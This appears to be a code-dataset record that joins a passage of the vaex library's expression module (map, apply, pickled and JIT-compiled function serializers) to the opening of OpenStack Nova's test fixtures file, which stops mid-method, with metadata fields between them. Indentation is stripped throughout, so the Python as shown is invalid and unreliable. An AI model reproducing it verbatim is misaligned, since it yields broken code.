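# Illustrative usage sketch (not part of the original source): isin as a lazy
# boolean filter; the column name is hypothetical.
#
# >>> import vaex
# >>> df = vaex.from_arrays(animal=['cat', 'dog', 'fish'])
# >>> df[df.animal.isin(['cat', 'fish'])].animal.tolist()
# ['cat', 'fish']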
def apply(self, f, vectorize=False, multiprocessing=True):
"""Apply a function along all values of an Expression.
Shorthand for ``df.apply(f, arguments=[expression])``, see :meth:`DataFrame.apply`
Example:
>>> df = vaex.example()
>>> df.x
Expression = x
Length: 330,000 dtype: float64 (column)
---------------------------------------
0 -0.777471
1 3.77427
2 1.37576
3 -7.06738
4 0.243441
>>> def func(x):
... return x**2
>>> df.x.apply(func)
Expression = lambda_function(x)
Length: 330,000 dtype: float64 (expression)
-------------------------------------------
0 0.604461
1 14.2451
2 1.89272
3 49.9478
4 0.0592637
:param f: A function to be applied on the Expression values
:param vectorize: Call f with arrays instead of scalars (for better performance).
:param bool multiprocessing: Use multiple processes to avoid the GIL (Global Interpreter Lock).
:returns: A function that is lazily evaluated when called.
"""
return self.ds.apply(f, [self.expression], vectorize=vectorize, multiprocessing=multiprocessing)
def dropmissing(self):
# TODO: df.dropna does not support inplace
# df = self.df if inplace else self.df.copy()
df = self.ds
df = df.dropmissing(column_names=[self.expression])
return df._expr(self.expression)
def dropnan(self):
# TODO: df.dropna does not support inplace
# df = self.df if inplace else self.df.copy()
df = self.ds
df = df.dropnan(column_names=[self.expression])
return df._expr(self.expression)
def dropna(self):
# TODO: df.dropna does not support inplace
# df = self.df if inplace else self.df.copy()
df = self.ds
df = df.dropna(column_names=[self.expression])
return df._expr(self.expression)
def map(self, mapper, nan_value=None, missing_value=None, default_value=None, allow_missing=False, axis=None):
"""Map values of an expression or in memory column according to an input
dictionary or a custom callable function.
Example:
>>> import vaex
>>> df = vaex.from_arrays(color=['red', 'red', 'blue', 'red', 'green'])
>>> mapper = {'red': 1, 'blue': 2, 'green': 3}
>>> df['color_mapped'] = df.color.map(mapper)
>>> df
# color color_mapped
0 red 1
1 red 1
2 blue 2
3 red 1
4 green 3
>>> import numpy as np
>>> df = vaex.from_arrays(type=[0, 1, 2, 2, 2, np.nan])
>>> df['role'] = df['type'].map({0: 'admin', 1: 'maintainer', 2: 'user', np.nan: 'unknown'})
>>> df
# type role
0 0 admin
1 1 maintainer
2 2 user
3 2 user
4 2 user
5 nan unknown
>>> import vaex
>>> import numpy as np
>>> df = vaex.from_arrays(type=[0, 1, 2, 2, 2, 4])
>>> df['role'] = df['type'].map({0: 'admin', 1: 'maintainer', 2: 'user'}, default_value='unknown')
>>> df
# type role
0 0 admin
1 1 maintainer
2 2 user
3 2 user
4 2 user
5 4 unknown
:param mapper: dict like object used to map the values from keys to values
:param nan_value: value to be used when a nan is present (and not in the mapper)
:param missing_value: value to be used when there is a missing value
:param default_value: value to be used when a value is not in the mapper (like dict.get(key, default))
:param allow_missing: used to signal that values in the mapper should map to a masked array with missing values,
assumed True when default_value is not None.
:param bool axis: Axis over which to determine the unique elements (None will flatten arrays or lists)
:return: A vaex expression
:rtype: vaex.expression.Expression
"""
assert isinstance(mapper, collectionsAbc.Mapping), "mapper should be a dict like object"
if axis is not None:
raise ValueError('only axis=None is supported')
df = self.ds
mapper_keys = list(mapper.keys())
mapper_values = list(mapper.values())
try:
mapper_nan_key_mask = np.isnan(mapper_keys)
except TypeError:
# case where we have mixed strings/nan etc
def try_nan(x):
try:
return np.isnan(x)
except:
return False
mapper_nan_key_mask = np.array([try_nan(k) for k in mapper_keys])
mapper_has_nan = mapper_nan_key_mask.sum() > 0
if mapper_nan_key_mask.sum() > 1:
raise ValueError('Insanity, you provided multiple nan values as keys for your dict')
if mapper_has_nan:
for key, value in mapper.items():
if key != key:
nan_value = value
for key, value in mapper.items():
if key is None:
missing_value = value
if axis is not None:
raise ValueError('only axis=None is supported')
# we map the keys to ordinal values [0, N-1] using the set
key_set = df._set(self.expression, flatten=axis is None)
found_keys = vaex.array_types.tolist(key_set.keys())
# we want all possible values to be converted
# so mapper's key should be a superset of the keys found
use_masked_array = False
if default_value is not None:
allow_missing = True
if allow_missing:
use_masked_array = True
if not set(mapper_keys).issuperset(found_keys):
missing = set(found_keys).difference(mapper_keys)
missing0 = list(missing)[0]
only_has_nan = missing0 != missing0 and len(missing) == 1
if allow_missing:
if default_value is not None:
value0 = list(mapper.values())[0]
assert np.issubdtype(type(default_value), np.array(value0).dtype), "default value has to be of similar type"
else:
if only_has_nan:
pass # we're good, the hash mapper deals with nan
else:
if missing != {None}:
raise ValueError('Missing %i values in mapper: %s' % (len(missing), missing))
# and these are the corresponding choices
# note that here we map 'planned' unknown values to the default values
# and later on in _choose, we map values not even seen in the dataframe
# to the default_value
dtype_item = self.data_type(self.expression, axis=-1)
mapper_keys = dtype_item.create_array(mapper_keys)
fingerprint = key_set.fingerprint + "-mapper"
hash_map_unique = vaex.hash.HashMapUnique.from_keys(mapper_keys, fingerprint=fingerprint, dtype=dtype_item)
indices = hash_map_unique.map(mapper_keys)
mapper_values = [mapper_values[i] for i in indices]
choices = [default_value] + [mapper_values[index] for index in indices]
choices = pa.array(choices)
key_hash_map_unique_name = df.add_variable('map_key_hash_map_unique', hash_map_unique, unique=True)
choices_name = df.add_variable('map_choices', choices, unique=True)
if allow_missing:
expr = '_map({}, {}, {}, use_missing={!r}, axis={!r})'.format(self, key_hash_map_unique_name, choices_name, use_masked_array, axis)
else:
expr = '_map({}, {}, {}, axis={!r})'.format(self, key_hash_map_unique_name, choices_name, axis)
return Expression(df, expr)
@property
def is_masked(self):
return self.ds.is_masked(self.expression)
def is_string(self):
return self.df.is_string(self.expression)
class FunctionSerializable(object):
pass
@vaex.serialize.register
class FunctionSerializablePickle(FunctionSerializable):
def __init__(self, f=None, multiprocessing=False):
self.f = f
self.multiprocessing = multiprocessing
def __eq__(self, rhs):
return self.f == rhs.f
def pickle(self, function):
return pickle.dumps(function)
def unpickle(self, data):
return pickle.loads(data)
def __getstate__(self):
return self.state_get()
def __setstate__(self, state):
self.state_set(state)
def state_get(self):
data = self.pickle(self.f)
if vaex.utils.PY2:
pickled = base64.encodestring(data)
else:
pickled = base64.encodebytes(data).decode('ascii')
return dict(pickled=pickled)
@classmethod
def state_from(cls, state, trusted=True):
obj = cls()
obj.state_set(state, trusted=trusted)
return obj
def state_set(self, state, trusted=True):
data = state['pickled']
if vaex.utils.PY2:
data = base64.decodestring(data)
else:
data = base64.decodebytes(data.encode('ascii'))
if trusted is False:
raise ValueError("Will not unpickle data when source is not trusted")
self.f = self.unpickle(data)
def __call__(self, *args, **kwargs):
'''Forward the call to the real function'''
import vaex.multiprocessing
return vaex.multiprocessing.apply(self._apply, args, kwargs, self.multiprocessing)
def _apply(self, *args, **kwargs):
return self.f(*args, **kwargs)
class FunctionSerializableJit(FunctionSerializable):
def __init__(self, expression, arguments, argument_dtypes, return_dtype, verbose=False, compile=True):
self.expression = expression
self.arguments = arguments
self.argument_dtypes = argument_dtypes
self.return_dtype = return_dtype
self.verbose = verbose
if compile:
self.f = self.compile()
else:
def placeholder(*args, **kwargs):
raise Exception('You chose not to compile this function (locally), but did invoke it')
self.f = placeholder
def state_get(self):
return dict(expression=self.expression,
arguments=self.arguments,
argument_dtypes=list(map(lambda dtype: str(dtype.numpy), self.argument_dtypes)),
return_dtype=str(self.return_dtype),
verbose=self.verbose)
@classmethod
def state_from(cls, state, trusted=True):
return cls(expression=state['expression'],
arguments=state['arguments'],
argument_dtypes=list(map(lambda s: DataType(np.dtype(s)), state['argument_dtypes'])),
return_dtype=DataType(np.dtype(state['return_dtype'])),
verbose=state['verbose'])
@classmethod
def build(cls, expression, df=None, verbose=False, compile=True):
df = df or expression.df
# if it's a virtual column, we probably want to optimize that
# TODO: fully extract the virtual columns, i.e. depending ones?
expression = str(expression)
if expression in df.virtual_columns:
expression = df.virtual_columns[expression]
# function validation, and finding variable names
all_vars = df.get_column_names(hidden=True) + list(df.variables.keys())
funcs = set(list(expression_namespace.keys()) + list(df.functions.keys()))
names = []
vaex.expresso.validate_expression(expression, all_vars, funcs, names)
# TODO: can we do the above using the Expression API?
arguments = list(set(names))
argument_dtypes = [df.data_type(argument, array_type='numpy') for argument in arguments]
return_dtype = df[expression].dtype
return cls(str(expression), arguments, argument_dtypes, return_dtype, verbose, compile=compile)
def __call__(self, *args, **kwargs):
'''Forward the call to the numba function'''
return self.f(*args, **kwargs)
@vaex.serialize.register
class FunctionSerializableNumba(FunctionSerializableJit):
def compile(self):
import numba
argstring = ", ".join(self.arguments)
code = '''
from numpy import *
def f({0}):
return {1}'''.format(argstring, self.expression)
if self.verbose:
print('Generated code:\n' + code)
scope = {}
exec(code, scope)
f = scope['f']
# numba part
def get_type(name):
if name == "bool":
name = "bool_"
return getattr(numba, name)
argument_dtypes_numba = [get_type(argument_dtype.numpy.name) for argument_dtype in self.argument_dtypes]
return_dtype_numba = get_type(self.return_dtype.numpy.name)
vectorizer = numba.vectorize([return_dtype_numba(*argument_dtypes_numba)])
return vectorizer(f)
@vaex.serialize.register
class FunctionSerializableCuda(FunctionSerializableJit):
def compile(self):
import cupy
# code generation
argstring = ", ".join(self.arguments)
code = '''
from cupy import *
import cupy
@fuse()
def f({0}):
return {1}
'''.format(argstring, self.expression)#, ";".join(conversions))
if self.verbose:
print("generated code")
print(code)
scope = dict()#cupy=cupy)
exec(code, scope)
func = scope['f']
def wrapper(*args):
args = [vaex.array_types.to_numpy(k) for k in args]
args = [vaex.utils.to_native_array(arg) if isinstance(arg, np.ndarray) else arg for arg in args]
args = [cupy.asarray(arg) if isinstance(arg, np.ndarray) else arg for arg in args]
return cupy.asnumpy(func(*args))
return wrapper
# TODO: this is not the right abstraction, since this won't allow a
# numba version for the function
@vaex.serialize.register
class FunctionToScalar(FunctionSerializablePickle):
def __call__(self, *args, **kwargs):
import vaex.multiprocessing
return vaex.multiprocessing.apply(self._apply, args, kwargs, self.multiprocessing)
def _apply(self, *args, **kwargs):
length = len(args[0])
result = []
def fix_type(v):
# TODO: only when column is str type?
if isinstance(v, np.str_):
return str(v)
if isinstance(v, np.bytes_):
return v.decode('utf8')
else:
return v
args = [vaex.array_types.tolist(k) for k in args]
for i in range(length):
scalar_result = self.f(*[fix_type(k[i]) for k in args], **{key: value[i] for key, value in kwargs.items()})
result.append(scalar_result)
result = np.array(result)
return result
class Function(object):
def __init__(self, dataset, name, f):
self.dataset = dataset
self.name = name
if not vaex.serialize.can_serialize(f): # if not serializable, assume we can use pickle
f = FunctionSerializablePickle(f)
self.f = f
def __call__(self, *args, **kwargs):
arg_string = ", ".join([str(k) for k in args] + ['{}={:r}'.format(name, value) for name, value in kwargs.items()])
expression = "{}({})".format(self.name, arg_string)
return Expression(self.dataset, expression)
class FunctionBuiltin(object):
def __init__(self, dataset, name, **kwargs):
self.dataset = dataset
self.name = name
self.kwargs = kwargs
def __call__(self, *args, **kwargs):
kwargs = dict(kwargs, **self.kwargs)
arg_string = ", ".join([str(k) for k in args] + ['{}={:r}'.format(name, value) for name, value in kwargs.items()])
expression = "{}({})".format(self.name, arg_string)
return Expression(self.dataset, expression)
|
[] |
[] |
[
"VAEX_DEBUG"
] |
[]
|
["VAEX_DEBUG"]
|
python
| 1 | 0 | |
nova/tests/fixtures/nova.py
|
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Fixtures for Nova tests."""
import collections
from contextlib import contextmanager
import logging as std_logging
import os
import warnings
import fixtures
import futurist
import mock
from openstack import service_description
from oslo_concurrency import lockutils
from oslo_config import cfg
from oslo_db import exception as db_exc
from oslo_log import log as logging
import oslo_messaging as messaging
from oslo_messaging import conffixture as messaging_conffixture
from oslo_privsep import daemon as privsep_daemon
from oslo_utils.fixture import uuidsentinel
from requests import adapters
from sqlalchemy import exc as sqla_exc
from wsgi_intercept import interceptor
from nova.api.openstack import wsgi_app
from nova.api import wsgi
from nova.compute import multi_cell_list
from nova.compute import rpcapi as compute_rpcapi
from nova import context
from nova.db import migration
from nova.db.sqlalchemy import api as session
from nova import exception
from nova import objects
from nova.objects import base as obj_base
from nova.objects import service as service_obj
import nova.privsep
from nova import quota as nova_quota
from nova import rpc
from nova.scheduler import weights
from nova import service
from nova.tests.functional.api import client
CONF = cfg.CONF
LOG = logging.getLogger(__name__)
DB_SCHEMA = collections.defaultdict(str)
SESSION_CONFIGURED = False
PROJECT_ID = '6f70656e737461636b20342065766572'
class ServiceFixture(fixtures.Fixture):
"""Run a service as a test fixture."""
def __init__(self, name, host=None, cell=None, **kwargs):
name = name
# If not otherwise specified, the host will default to the
# name of the service. Some things like aggregates care that
# this is stable.
host = host or name
kwargs.setdefault('host', host)
kwargs.setdefault('binary', 'nova-%s' % name)
self.cell = cell
self.kwargs = kwargs
def setUp(self):
super(ServiceFixture, self).setUp()
self.ctxt = context.get_admin_context()
if self.cell:
context.set_target_cell(self.ctxt, self.cell)
with mock.patch('nova.context.get_admin_context',
return_value=self.ctxt):
self.service = service.Service.create(**self.kwargs)
self.service.start()
self.addCleanup(self.service.kill)
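# Illustrative usage sketch (not part of the original source): starting a fake
# compute service from inside a test case; the host name is hypothetical.
#
#     compute = self.useFixture(ServiceFixture('compute', host='host1'))
#     # compute.service is the running nova Service instance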
class NullHandler(std_logging.Handler):
"""custom default NullHandler to attempt to format the record.
Used in conjunction with
log_fixture.get_logging_handle_error_fixture to detect formatting errors in
debug level logs without saving the logs.
"""
def handle(self, record):
self.format(record)
def emit(self, record):
pass
def createLock(self):
self.lock = None
class StandardLogging(fixtures.Fixture):
"""Setup Logging redirection for tests.
There are a number of things we want to handle with logging in tests:
* Redirect the logging to somewhere that we can test or dump it later.
* Ensure that as many DEBUG messages as possible are actually
executed, to ensure they are actually syntactically valid (they
often have not been).
* Ensure that we create useful output for tests that doesn't
overwhelm the testing system (which means we can't capture the
100 MB of debug logging on every run).
To do this we create a logger fixture at the root level, which
defaults to INFO and create a Null Logger at DEBUG which lets
us execute log messages at DEBUG but not keep the output.
To support local debugging OS_DEBUG=True can be set in the
environment, which will print out the full debug logging.
There are also a set of overrides for particularly verbose
modules to be even less than INFO.
"""
def setUp(self):
super(StandardLogging, self).setUp()
# set root logger to debug
root = std_logging.getLogger()
root.setLevel(std_logging.DEBUG)
# supports collecting debug level for local runs
if os.environ.get('OS_DEBUG') in ('True', 'true', '1', 'yes'):
level = std_logging.DEBUG
else:
level = std_logging.INFO
# Collect logs
fs = '%(asctime)s %(levelname)s [%(name)s] %(message)s'
self.logger = self.useFixture(
fixtures.FakeLogger(format=fs, level=None))
# TODO(sdague): why can't we send level through the fake
# logger? Tests prove that it breaks, but it's worth getting
# to the bottom of.
root.handlers[0].setLevel(level)
if level > std_logging.DEBUG:
# Just attempt to format debug level logs, but don't save them
handler = NullHandler()
self.useFixture(fixtures.LogHandler(handler, nuke_handlers=False))
handler.setLevel(std_logging.DEBUG)
# Don't log every single DB migration step
std_logging.getLogger(
'migrate.versioning.api').setLevel(std_logging.WARNING)
# Or alembic for model comparisons.
std_logging.getLogger('alembic').setLevel(std_logging.WARNING)
# At times we end up calling back into main() functions in
# testing. This has the possibility of calling logging.setup
# again, which completely unwinds the logging capture we've
# created here. Once we've setup the logging the way we want,
# disable the ability for the test to change this.
def fake_logging_setup(*args):
pass
self.useFixture(
fixtures.MonkeyPatch('oslo_log.log.setup', fake_logging_setup))
def delete_stored_logs(self):
# NOTE(gibi): this depends on the internals of the fixtures.FakeLogger.
# This could be enhanced once the PR
# https://github.com/testing-cabal/fixtures/pull/42 merges
self.logger._output.truncate(0)
class DatabasePoisonFixture(fixtures.Fixture):
def setUp(self):
super(DatabasePoisonFixture, self).setUp()
self.useFixture(fixtures.MonkeyPatch(
'oslo_db.sqlalchemy.enginefacade._TransactionFactory.'
'_create_session',
self._poison_configure))
def _poison_configure(self, *a, **k):
# If you encounter this error, you might be tempted to just not
# inherit from NoDBTestCase. Bug #1568414 fixed a few hundred of these
# errors, and not once was that the correct solution. Instead,
# consider some of the following tips (when applicable):
#
# - mock at the object layer rather than the db layer, for example:
# nova.objects.instance.Instance.get
# vs.
# nova.db.instance_get
#
# - mock at the api layer rather than the object layer, for example:
# nova.api.openstack.common.get_instance
# vs.
# nova.objects.instance.Instance.get
#
# - mock code that requires the database but is otherwise tangential
# to the code you're testing (for example: EventReporterStub)
#
# - peruse some of the other database poison warning fixes here:
# https://review.opendev.org/#/q/topic:bug/1568414
raise Exception('This test uses methods that set internal oslo_db '
'state, but it does not claim to use the database. '
'This will conflict with the setup of tests that '
'do use the database and cause failures later.')
class SingleCellSimple(fixtures.Fixture):
"""Setup the simplest cells environment possible
This should be used when you do not care about multiple cells,
or having a "real" environment for tests that should not care.
This will give you a single cell, and map any and all accesses
to that cell (even things that would go to cell0).
If you need to distinguish between cell0 and cellN, then you
should use the CellDatabases fixture.
If instances should appear to still be in scheduling state, pass
instances_created=False to init.
"""
def __init__(
self, instances_created=True, project_id=PROJECT_ID,
):
self.instances_created = instances_created
self.project_id = project_id
def setUp(self):
super(SingleCellSimple, self).setUp()
self.useFixture(fixtures.MonkeyPatch(
'nova.objects.CellMappingList._get_all_from_db',
self._fake_cell_list))
self.useFixture(fixtures.MonkeyPatch(
'nova.objects.CellMappingList._get_by_project_id_from_db',
self._fake_cell_list))
self.useFixture(fixtures.MonkeyPatch(
'nova.objects.CellMapping._get_by_uuid_from_db',
self._fake_cell_get))
self.useFixture(fixtures.MonkeyPatch(
'nova.objects.HostMapping._get_by_host_from_db',
self._fake_hostmapping_get))
self.useFixture(fixtures.MonkeyPatch(
'nova.objects.InstanceMapping._get_by_instance_uuid_from_db',
self._fake_instancemapping_get))
self.useFixture(fixtures.MonkeyPatch(
'nova.objects.InstanceMappingList._get_by_instance_uuids_from_db',
self._fake_instancemapping_get_uuids))
self.useFixture(fixtures.MonkeyPatch(
'nova.objects.InstanceMapping._save_in_db',
self._fake_instancemapping_get_save))
self.useFixture(fixtures.MonkeyPatch(
'nova.context.target_cell',
self._fake_target_cell))
self.useFixture(fixtures.MonkeyPatch(
'nova.context.set_target_cell',
self._fake_set_target_cell))
def _fake_hostmapping_get(self, *args):
return {'id': 1,
'updated_at': None,
'created_at': None,
'host': 'host1',
'cell_mapping': self._fake_cell_list()[0]}
def _fake_instancemapping_get_common(self, instance_uuid):
return {
'id': 1,
'updated_at': None,
'created_at': None,
'instance_uuid': instance_uuid,
'cell_id': (self.instances_created and 1 or None),
'project_id': self.project_id,
'cell_mapping': (
self.instances_created and self._fake_cell_get() or None),
}
def _fake_instancemapping_get_save(self, *args):
return self._fake_instancemapping_get_common(args[-2])
def _fake_instancemapping_get(self, *args):
return self._fake_instancemapping_get_common(args[-1])
def _fake_instancemapping_get_uuids(self, *args):
return [self._fake_instancemapping_get(uuid)
for uuid in args[-1]]
def _fake_cell_get(self, *args):
return self._fake_cell_list()[0]
def _fake_cell_list(self, *args):
return [{'id': 1,
'updated_at': None,
'created_at': None,
'uuid': uuidsentinel.cell1,
'name': 'onlycell',
'transport_url': 'fake://nowhere/',
'database_connection': 'sqlite:///',
'disabled': False}]
@contextmanager
def _fake_target_cell(self, context, target_cell):
# Just do something simple and set/unset the cell_uuid on the context.
if target_cell:
context.cell_uuid = getattr(target_cell, 'uuid',
uuidsentinel.cell1)
else:
context.cell_uuid = None
yield context
def _fake_set_target_cell(self, context, cell_mapping):
# Just do something simple and set/unset the cell_uuid on the context.
if cell_mapping:
context.cell_uuid = getattr(cell_mapping, 'uuid',
uuidsentinel.cell1)
else:
context.cell_uuid = None
class CheatingSerializer(rpc.RequestContextSerializer):
"""A messaging.RequestContextSerializer that helps with cells.
Our normal serializer does not pass in the context like db_connection
and mq_connection, for good reason. We don't really want/need to
force a remote RPC server to use our values for this. However,
during unit and functional tests, since we're all in the same
process, we want cell-targeted RPC calls to preserve these values.
Unless we had per-service config and database layer state for
the fake services we start, this is a reasonable cheat.
"""
def serialize_context(self, context):
"""Serialize context with the db_connection inside."""
values = super(CheatingSerializer, self).serialize_context(context)
values['db_connection'] = context.db_connection
values['mq_connection'] = context.mq_connection
return values
def deserialize_context(self, values):
"""Deserialize context and honor db_connection if present."""
ctxt = super(CheatingSerializer, self).deserialize_context(values)
ctxt.db_connection = values.pop('db_connection', None)
ctxt.mq_connection = values.pop('mq_connection', None)
return ctxt
class CellDatabases(fixtures.Fixture):
"""Create per-cell databases for testing.
How to use::
fix = CellDatabases()
fix.add_cell_database('connection1')
fix.add_cell_database('connection2', default=True)
self.useFixture(fix)
Passing default=True tells the fixture which database should
be given to code that doesn't target a specific cell.
"""
def __init__(self):
self._ctxt_mgrs = {}
self._last_ctxt_mgr = None
self._default_ctxt_mgr = None
# NOTE(danms): Use a ReaderWriterLock to synchronize our
# global database muckery here. If we change global db state
# to point to a cell, we need to take an exclusive lock to
# prevent any other calls to get_context_manager() until we
# reset to the default.
self._cell_lock = lockutils.ReaderWriterLock()
def _cache_schema(self, connection_str):
# NOTE(melwitt): See the regular Database fixture for why
# we do this.
global DB_SCHEMA
if not DB_SCHEMA[('main', None)]:
ctxt_mgr = self._ctxt_mgrs[connection_str]
engine = ctxt_mgr.writer.get_engine()
conn = engine.connect()
migration.db_sync(database='main')
DB_SCHEMA[('main', None)] = "".join(line for line
in conn.connection.iterdump())
engine.dispose()
@contextmanager
def _wrap_target_cell(self, context, cell_mapping):
# NOTE(danms): This method is responsible for switching global
# database state in a safe way such that code that doesn't
# know anything about cell targeting (i.e. compute node code)
# can continue to operate when called from something that has
# targeted a specific cell. In order to make this safe from a
# dining-philosopher-style deadlock, we need to be able to
# support multiple threads talking to the same cell at the
# same time and potentially recursion within the same thread
# from code that would otherwise be running on separate nodes
# in real life, but where we're actually recursing in the
# tests.
#
# The basic logic here is:
# 1. Grab a reader lock to see if the state is already pointing at
# the cell we want. If it is, we can yield and return without
# altering the global state further. The read lock ensures that
# global state won't change underneath us, and multiple threads
# can be working at the same time, as long as they are looking
# for the same cell.
# 2. If we do need to change the global state, grab a writer lock
# to make that change, which assumes that nothing else is looking
# at a cell right now. We do only non-schedulable things while
# holding that lock to avoid the deadlock mentioned above.
# 3. We then re-lock with a reader lock just as step #1 above and
# yield to do the actual work. We can do schedulable things
# here and not exclude other threads from making progress.
# If an exception is raised, we capture that and save it.
# 4. If we changed state in #2, we need to change it back. So we grab
# a writer lock again and do that.
# 5. Finally, if an exception was raised in #3 while state was
# changed, we raise it to the caller.
if cell_mapping:
desired = self._ctxt_mgrs[cell_mapping.database_connection]
else:
desired = self._default_ctxt_mgr
with self._cell_lock.read_lock():
if self._last_ctxt_mgr == desired:
with self._real_target_cell(context, cell_mapping) as c:
yield c
return
raised_exc = None
with self._cell_lock.write_lock():
if cell_mapping is not None:
# This assumes the next local DB access is the same cell that
# was targeted last time.
self._last_ctxt_mgr = desired
with self._cell_lock.read_lock():
if self._last_ctxt_mgr != desired:
# NOTE(danms): This is unlikely to happen, but it's possible
# another waiting writer changed the state between us letting
# it go and re-acquiring as a reader. If lockutils supported
# upgrading and downgrading locks, this wouldn't be a problem.
# Regardless, assert that it is still as we left it here
# so we don't hit the wrong cell. If this becomes a problem,
# we just need to retry the write section above until we land
# here with the cell we want.
raise RuntimeError('Global DB state changed underneath us')
try:
with self._real_target_cell(context, cell_mapping) as ccontext:
yield ccontext
except Exception as exc:
raised_exc = exc
with self._cell_lock.write_lock():
# Once we have returned from the context, we need
# to restore the default context manager for any
# subsequent calls
self._last_ctxt_mgr = self._default_ctxt_mgr
if raised_exc:
raise raised_exc
def _wrap_create_context_manager(self, connection=None):
ctxt_mgr = self._ctxt_mgrs[connection]
return ctxt_mgr
def _wrap_get_context_manager(self, context):
try:
# If already targeted, we can proceed without a lock
if context.db_connection:
return context.db_connection
except AttributeError:
# Unit tests with None, FakeContext, etc
pass
# NOTE(melwitt): This is a hack to try to deal with
# local accesses i.e. non target_cell accesses.
with self._cell_lock.read_lock():
# FIXME(mriedem): This is actually misleading and means we don't
# catch things like bug 1717000 where a context should be targeted
# to a cell but it's not, and the fixture here just returns the
# last targeted context that was used.
return self._last_ctxt_mgr
def _wrap_get_server(self, target, endpoints, serializer=None):
"""Mirror rpc.get_server() but with our special sauce."""
serializer = CheatingSerializer(serializer)
return messaging.get_rpc_server(rpc.TRANSPORT,
target,
endpoints,
executor='eventlet',
serializer=serializer)
def _wrap_get_client(self, target, version_cap=None, serializer=None,
call_monitor_timeout=None):
"""Mirror rpc.get_client() but with our special sauce."""
serializer = CheatingSerializer(serializer)
return messaging.RPCClient(rpc.TRANSPORT,
target,
version_cap=version_cap,
serializer=serializer,
call_monitor_timeout=call_monitor_timeout)
def add_cell_database(self, connection_str, default=False):
"""Add a cell database to the fixture.
:param connection_str: An identifier used to represent the connection
string for this database. It should match the database_connection field
in the corresponding CellMapping.
"""
# NOTE(danms): Create a new context manager for the cell, which
# will house the sqlite:// connection for this cell's in-memory
# database. Store/index it by the connection string, which is
# how we identify cells in CellMapping.
ctxt_mgr = session.create_context_manager()
self._ctxt_mgrs[connection_str] = ctxt_mgr
# NOTE(melwitt): The first DB access through service start is
# local so this initializes _last_ctxt_mgr for that and needs
# to be a compute cell.
self._last_ctxt_mgr = ctxt_mgr
# NOTE(danms): Record which context manager should be the default
# so we can restore it when we return from target-cell contexts.
# If none has been provided yet, store the current one in case
# no default is ever specified.
if self._default_ctxt_mgr is None or default:
self._default_ctxt_mgr = ctxt_mgr
def get_context_manager(context):
return ctxt_mgr
# NOTE(danms): This is a temporary MonkeyPatch just to get
# a new database created with the schema we need and the
# context manager for it stashed.
with fixtures.MonkeyPatch(
'nova.db.sqlalchemy.api.get_context_manager',
get_context_manager):
engine = ctxt_mgr.writer.get_engine()
engine.dispose()
self._cache_schema(connection_str)
conn = engine.connect()
conn.connection.executescript(DB_SCHEMA[('main', None)])
def setUp(self):
super(CellDatabases, self).setUp()
self.addCleanup(self.cleanup)
self._real_target_cell = context.target_cell
# NOTE(danms): These context managers are in place for the
# duration of the test (unlike the temporary ones above) and
# provide the actual "runtime" switching of connections for us.
self.useFixture(fixtures.MonkeyPatch(
'nova.db.sqlalchemy.api.create_context_manager',
self._wrap_create_context_manager))
self.useFixture(fixtures.MonkeyPatch(
'nova.db.sqlalchemy.api.get_context_manager',
self._wrap_get_context_manager))
self.useFixture(fixtures.MonkeyPatch(
'nova.context.target_cell',
self._wrap_target_cell))
self.useFixture(fixtures.MonkeyPatch(
'nova.rpc.get_server',
self._wrap_get_server))
self.useFixture(fixtures.MonkeyPatch(
'nova.rpc.get_client',
self._wrap_get_client))
def cleanup(self):
for ctxt_mgr in self._ctxt_mgrs.values():
engine = ctxt_mgr.writer.get_engine()
engine.dispose()
class Database(fixtures.Fixture):
def __init__(self, database='main', version=None, connection=None):
"""Create a database fixture.
:param database: The type of database, 'main', or 'api'
:param connection: The connection string to use
"""
super(Database, self).__init__()
# NOTE(pkholkin): oslo_db.enginefacade is configured in tests the same
# way as it is done for any other service that uses db
global SESSION_CONFIGURED
if not SESSION_CONFIGURED:
session.configure(CONF)
SESSION_CONFIGURED = True
self.database = database
self.version = version
if database == 'main':
if connection is not None:
ctxt_mgr = session.create_context_manager(
connection=connection)
self.get_engine = ctxt_mgr.writer.get_engine
else:
self.get_engine = session.get_engine
elif database == 'api':
self.get_engine = session.get_api_engine
def _cache_schema(self):
global DB_SCHEMA
if not DB_SCHEMA[(self.database, self.version)]:
engine = self.get_engine()
conn = engine.connect()
migration.db_sync(database=self.database, version=self.version)
DB_SCHEMA[(self.database, self.version)] = "".join(
line for line in conn.connection.iterdump())
engine.dispose()
def cleanup(self):
engine = self.get_engine()
engine.dispose()
def reset(self):
engine = self.get_engine()
engine.dispose()
self._cache_schema()
conn = engine.connect()
conn.connection.executescript(
DB_SCHEMA[(self.database, self.version)])
def setUp(self):
super(Database, self).setUp()
self.reset()
self.addCleanup(self.cleanup)
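# Illustrative usage sketch (not part of the original source): a test case that
# needs both the main and the API schemas could opt in like this.
#
#     self.useFixture(Database(database='main'))
#     self.useFixture(Database(database='api'))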
class DefaultFlavorsFixture(fixtures.Fixture):
def setUp(self):
super(DefaultFlavorsFixture, self).setUp()
ctxt = context.get_admin_context()
defaults = {'rxtx_factor': 1.0, 'disabled': False, 'is_public': True,
'ephemeral_gb': 0, 'swap': 0}
extra_specs = {
"hw:numa_nodes": "1"
}
default_flavors = [
objects.Flavor(context=ctxt, memory_mb=512, vcpus=1,
root_gb=1, flavorid='1', name='m1.tiny',
**defaults),
objects.Flavor(context=ctxt, memory_mb=2048, vcpus=1,
root_gb=20, flavorid='2', name='m1.small',
**defaults),
objects.Flavor(context=ctxt, memory_mb=4096, vcpus=2,
root_gb=40, flavorid='3', name='m1.medium',
**defaults),
objects.Flavor(context=ctxt, memory_mb=8192, vcpus=4,
root_gb=80, flavorid='4', name='m1.large',
**defaults),
objects.Flavor(context=ctxt, memory_mb=16384, vcpus=8,
root_gb=160, flavorid='5', name='m1.xlarge',
**defaults),
objects.Flavor(context=ctxt, memory_mb=512, vcpus=1,
root_gb=1, flavorid='6', name='m1.tiny.specs',
extra_specs=extra_specs, **defaults),
]
for flavor in default_flavors:
flavor.create()
class RPCFixture(fixtures.Fixture):
def __init__(self, *exmods):
super(RPCFixture, self).__init__()
self.exmods = []
self.exmods.extend(exmods)
self._buses = {}
def _fake_create_transport(self, url):
# FIXME(danms): Right now, collapse all connections
